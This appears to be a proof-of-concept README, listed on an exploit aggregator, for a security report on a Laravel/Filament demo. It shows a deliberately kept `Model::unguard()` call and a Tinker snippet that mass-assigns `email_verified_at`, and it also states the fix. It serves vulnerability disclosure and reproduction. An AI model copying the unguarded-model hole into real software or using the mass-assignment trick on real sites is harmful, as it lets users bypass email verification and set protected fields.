## https://sploitus.com/exploit?id=0627BC58-449F-568D-B5ED-625E60ECDD67
# Filament Demo PoC โ mass-assignment
## Purpose
Minimal reproduction for a security report: demonstrates that `Model::unguard()` allows `email_verified_at` mass-assignment (model primitive).
**Important:** This repository is for local reproduction only. Do **not** use this code in production.
## Included
- `app/Providers/AppServiceProvider.php` โ contains `Model::unguard()` (vulnerable line)
- `README.md` (this file).
## Vulnerable snippet
Include this exact snippet (or point to the file/lines) so reviewers immediately see the issue:
```php
// app/Providers/AppServiceProvider.php (excerpt)
use Illuminate\Database\Eloquent\Model;
public function boot()
{
// vulnerable in production โ allows mass-assignment of any attribute
Model::unguard();
if (app()->environment('production')) {
URL::forceScheme('https');
}
}
```
## Quick setup (tested on Linux)
> These commands assume PHP, Composer and sqlite3 are installed on your machine.
1. **Clone and install dependencies**
```bash
git clone https://github.com//.git
cd
composer install
```
2. **Environment**
```bash
cp .env.example .env
# Edit .env if needed. Ensure:
# APP_ENV=local
# DB_CONNECTION=sqlite
```
```bash
php artisan key:generate
```
3. **Create SQLite database and migrate**
```bash
touch database/database.sqlite
php artisan migrate --seed
```
4. **Run dev server**
```bash
php artisan serve --host=127.0.0.1 --port=8000
```
5. **Demonstrate the mass-assignment primitive (tinker)**
```bash
php artisan tinker
```
## In the Tinker REPL paste:
```php
$attacker = \App\Models\User::factory()->create([
'name' => 'tinkerpoc',
'email' => 'tinkerpoc@example.test',
'password' => bcrypt('tinkerpocPass!'),
'email_verified_at' => '1337-01-01 00:00:00',
]);
```
Then from your shell:
```bash
sqlite3 database/database.sqlite "select id,email,email_verified_at from users where email='tinkerpoc@example.test';"
```
If `email_verified_at` contains the injected timestamp, the model-level mass-assignment primitive is demonstrated.
## Notes for maintainers / reviewers
* This repo intentionally preserves `Model::unguard()` to reproduce the issue. The fix is to remove `Model::unguard()` (or restrict it to local/testing) and add `$fillable` / `$guarded` on models.
* The Livewire registration component in the full demo may or may not forward arbitrary fields from the client; this repo demonstrates the model primitive rather than a specific HTTP exploit path.
## Safety & disclosure
* Do not run this against third-party servers. Only run locally on a VM you control.
* This repo is intended to be minimal and public for the sake of reproduction; do not include secrets.